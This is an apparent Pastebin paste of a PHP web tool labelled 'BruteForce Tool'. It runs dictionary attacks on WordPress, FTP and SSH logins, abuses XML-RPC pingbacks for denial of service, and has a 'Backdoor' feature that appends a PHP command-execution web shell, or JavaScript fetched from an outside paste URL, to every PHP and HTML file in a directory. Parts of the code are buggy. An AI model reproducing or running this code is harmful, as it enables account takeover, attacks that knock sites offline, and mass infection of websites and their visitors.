Advertisement
Guest User

Untitled

a guest
Feb 15th, 2018
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.06 KB | None | 0 0
  1. US9876543134IS8888
  2. DGDR8945KLDF88SD
  3.  
  4.  
  5. <style type="text/css">
  6. textarea { resize: none; }
  7. </style>
  8. <body text='white' bgcolor='#000000'>
  9. <title>BruteForce</title>
  10. <p align='center' dir='ltr'><font face='Gigi' size='6'>*** BruteForce Tool ***</font></p>
  11. <form method='POST'>
  12. <center>
  13. <p dir='ltr'>
  14. <textarea rows="2" cols="40" name="ip"></textarea><br><br>
  15. <input type='submit' value='Start !!!' name='start'><br><br/>
  16. <input name="myradio" value="1" type="radio"> Wordpress</div>
  17. <input name="myradio" value="2" type="radio"> FTP</div>
  18. <input name="myradio" value="3" type="radio"> SSH</div>
  19. <input name="myradio" value="4" type="radio"> XMLRPC/DOS</div><br/><br/>
  20. <p align='center' dir='ltr'><font face='Gigi' size='5'>Backdoor</font></p>
  21. <input type='text' placeholder="Directory" name='dir'>
  22. <select name="case">
  23. <option value="js">JS Backdoor</option>
  24. <option value="php">PHP Backdoor</option>
  25. </select>
  26. <input type='submit' value='Upload' name='up'><br/><br/>
  27. <form method="post" enctype="multipart/form-data">
  28. <input type="file" id="inputfile" name="inputfile">
  29. <input type="submit" name="back" value="Click To Upload"><br/><br/>
  30. </form>
  31. <div style='float: left; margin-left: 10px; border: dashed 1pt; background: black; color: white;'>
  32. <textarea cols='40' rows='30' name='username'>Username</textarea></div>
  33. <div style='float: right; margin-right: 10px; border: dashed 1pt; background: black; color: white;'>
  34. <textarea cols='40' rows='30' name='password'>Password</textarea></div>
  35. <font face='Verdana' size='1'>[-] RESULT [-]</font>
  36. </form>
  37.  
  38. <?php
  39.  
  40. @set_time_limit(0);
  41. $ip = explode("
  42. ", $_POST['ip']);
  43. $username = explode("
  44. ", $_POST['username']); // Mass
  45. $password = explode("
  46. ", $_POST['password']);
  47.  
  48.  
  49. function encdir($dir, $code) {
  50. $files = array_diff(scandir($dir), array('.', '..'));
  51. foreach ($files as $filemine){
  52. if(is_dir($dir.'\\'.$filemine)){
  53. encdir($dir.'\\'.$filemine);
  54. }else{
  55. $a = stripos(basename($dir.'/'.$filemine), 'php');
  56. $b = stripos(basename($dir.'/'.$filemine), 'html');
  57. if ($a !== false || $b !== false) {
  58. file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
  59. echo "<dir='ltr'><font face='Tahoma' size='2'><font color='#008000'><br/><br/>".$dir.'/'.$filemine.'<br/></font>';
  60. }
  61. }
  62. }
  63. }
  64.  
  65. function bruteftp($connect, $ip, $user, $pass) {
  66. $connect = ftp_connect($ip) or die("Error");
  67. if (ftp_login($connect, $user, $pass)) {
  68. echo "<p dir='ltr'><font face='Tahoma' size='2'>Cracked :
  69. <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
  70. }
  71. }
  72.  
  73.  
  74. function xmlrpc($target, $url, $base){
  75. $ch = curl_init();
  76. curl_setopt($ch, CURLOPT_URL, $url);
  77. curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
  78. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/xml'));
  79. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  80. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  81. curl_setopt($ch, CURLOPT_POST, 1);
  82. curl_setopt($ch, CURLOPT_POSTFIELDS,"<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$target</string></value></param><param><value><string>$base</string></value></param></params></methodCall>");
  83. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  84. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  85. $data = curl_exec($ch);
  86. }
  87.  
  88. $brute = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>";
  89.  
  90.  
  91. function bruteword($ip, $user, $pass){
  92. $curl = curl_init();
  93. curl_setopt($curl, CURLOPT_URL, $ip.'/wp-login.php');
  94. curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  95. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  96. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  97. curl_setopt($curl, CURLOPT_POST, true);
  98. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$user&pwd=$pass&wp-submit=Login&redirect_to=$ip/wp-admin/&testcookie=1");
  99. $exec = curl_exec($curl);
  100. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  101. if($http == 302 && preg_match("//",$result) || eregi('upload.php',$brute) ) {
  102. echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
  103. <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
  104. break;
  105. } else {
  106. echo "<br/><font color='red'>Failed</font><br>";
  107. }
  108. curl_close($curl);
  109. }
  110.  
  111. function brutessh($ip, $user, $pass){
  112. $ssh = @ssh2_connect($ip, 22);
  113. $auth = @ssh2_auth_password($ssh, $user, $pass);
  114. if($auth){
  115. echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
  116. <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
  117. }
  118. }
  119.  
  120. if (isset($_POST['start'])) {
  121. switch ($_POST['myradio']){
  122. case 1:
  123. foreach ($ip as $host) {
  124. foreach ($username as $user) {
  125. foreach ($password as $pass) {
  126. bruteword($host, $user, $pass);
  127. }
  128. }
  129. }
  130. break;
  131. case 2:
  132. foreach ($ip as $host) {
  133. foreach ($username as $user) {
  134. foreach ($password as $pass) {
  135. bruteftp($connect, $host, $user, $pass);
  136. }
  137. }
  138. }
  139. break;
  140. case 3:
  141. foreach ($ip as $host) {
  142. foreach ($username as $user) {
  143. foreach ($password as $pass) {
  144. brutessh($ip, $user, $pass);
  145. }
  146. }
  147. }
  148. break;
  149. case 4:
  150. foreach ($ip as $host) {
  151. foreach ($username as $user) {
  152. foreach ($password as $pass) {
  153. xmlrpc($host, $user, $pass);
  154. }
  155. }
  156. }
  157. break;
  158. }
  159. }
  160.  
  161. if(isset($_POST['back'])){
  162. if($_POST['case'] == 'js') {
  163. $code = file_get_contents('http://pastebin.com/raw/NrjQtBrn');
  164. encdir($_POST['dir'], $code);
  165. }elseif($_POST['case'] == 'php') {
  166. $shell = '<?php system($_GET["com"]); ?>';
  167. encdir($_POST['dir'], $shell);
  168. }
  169. }
  170.  
  171. echo "<p><font face='Verdana' size='1'>
  172. +------------------------------------------------------------------------------------------------------------+</font></p>
  173. <p><font face='Verdana' size='1'>Rec0ded by : <a>Dante & Dr.L0v3</a></font></p>
  174. </form>";
  175.  
  176. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement